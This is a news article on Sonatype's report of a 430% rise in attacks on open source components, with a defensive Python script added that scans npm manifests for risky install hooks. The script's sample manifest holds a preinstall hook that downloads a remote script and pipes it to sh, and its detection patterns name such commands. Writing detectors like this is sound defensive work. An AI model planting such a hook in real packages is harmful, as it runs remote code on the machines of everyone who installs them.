Security experts are warning of a 430% year-on-year increase in attacks targeting open source components directly in order to covertly infect key software supply chains.
There were 929 attacks recorded between July 2019 and May 2020, according to Sonatype’s annual State of the Software Supply Chain report. The study was compiled from analysis of 24,000 open source projects and 15,000 development organizations alongside interviews with 5600 software developers.
The targeting of open source components by malicious actors is concerning because of their popularity among DevOps teams to accelerate time-to-market.
According to the report, 1.5 trillion component download requests are projected in 2020 across all major open source ecosystems.
Node.js (npm) and Python (PyPI) repositories are thought to be among the most commonly targeted by attackers, as malicious code can be easily triggered during package installation.
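To show what "triggered during package installation" means in practice from a defender's side, here is an added example (not from the Sonatype report or any project it names): a small audit that reads an npm package.json, lists the lifecycle scripts npm runs automatically at install time, and flags command patterns worth a review before the package is admitted to a build. The two manifests are constructed for illustration; the hook names are real npm lifecycle events, while the risk patterns are heuristics of my own choosing.

```python
import json
import re

# Constructed sample manifests (illustrative only, not real packages).
BENIGN_MANIFEST = json.dumps({
    "name": "string-helpers", "version": "1.0.0",
    "scripts": {"test": "node test.js", "build": "tsc"},
})
SUSPICIOUS_MANIFEST = json.dumps({
    "name": "helpful-utils", "version": "0.0.3",
    "scripts": {
        # Runs on every `npm install` of a consumer, before any code review.
        "preinstall": "curl -s http://example.invalid/setup.sh | sh",
        "test": "echo ok",
    },
})

# npm lifecycle events that execute automatically during installation.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns (my own choice) that merit a closer look in an install hook.
RISKY_PATTERNS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    "inline_eval": re.compile(r"\bnode\s+-e\b|\beval\("),
    "encoded_payload": re.compile(r"base64|Buffer\.from\("),
    "shell_pipe": re.compile(r"\|\s*(sh|bash)\b"),
    "child_process": re.compile(r"child_process"),
}


def audit_manifest(manifest_text: str) -> dict:
    """Return {hook: [matched pattern names]} for each install-time hook present.

    A hook with an empty list is still reported: any install-time script is
    worth reading before the package is allowed into a build pipeline.
    """
    scripts = json.loads(manifest_text).get("scripts", {})
    findings = {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd is None:
            continue
        findings[hook] = [name for name, rx in RISKY_PATTERNS.items() if rx.search(cmd)]
    return findings


def is_suspicious(manifest_text: str) -> bool:
    """True when at least one install-time hook matches a risky pattern."""
    return any(hits for hits in audit_manifest(manifest_text).values())


if __name__ == "__main__":
    for label, m in (("benign", BENIGN_MANIFEST), ("suspicious", SUSPICIOUS_MANIFEST)):
        print(label, audit_manifest(m), is_suspicious(m))
```

The same idea applies to PyPI, where setup.py runs arbitrary Python at install time, but that requires executing or parsing Python rather than reading a JSON manifest, so it is out of scope here.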
This type of software supply chain attack is possible because in the open source world it is harder to discriminate between good and bad actors, and due to the inter-connected nature of projects, Sonatype claimed.
On the latter point, open source projects may have hundreds or thousands of dependencies on other projects that may contain known vulnerabilities which can be exploited.
In 2019, over 10% of global Java OSS downloads had at least one open source vulnerability, with new flaws being exploited in the wild within three days of public disclosure, the report claimed.
Today, 90% of components in an application are open source and 11% of those are known to contain vulnerabilities.
Sonatype CEO, Wayne Jackson, drew a distinction between “next-gen” upstream attacks and “legacy” software supply chain attacks, in which attackers go after vulnerabilities in products as soon as they are disclosed before organizations have time to remediate.
“Our research shows that commercial engineering teams are getting faster in their ability to respond to new zero day vulnerabilities,” he said.
“Therefore, it should come as no surprise that next generation supply chain attacks have increased 430% as adversaries are shifting their activities ‘upstream’ where they can infect a single open source component that has the potential to be distributed ‘downstream’ where it can be strategically and covertly exploited.”
Development teams able to mitigate these risks are more likely to use automated software composition analysis (SCA) tools across the development lifecycle, and to centrally maintain a software bill of materials (SBOM) for their applications, the report claimed.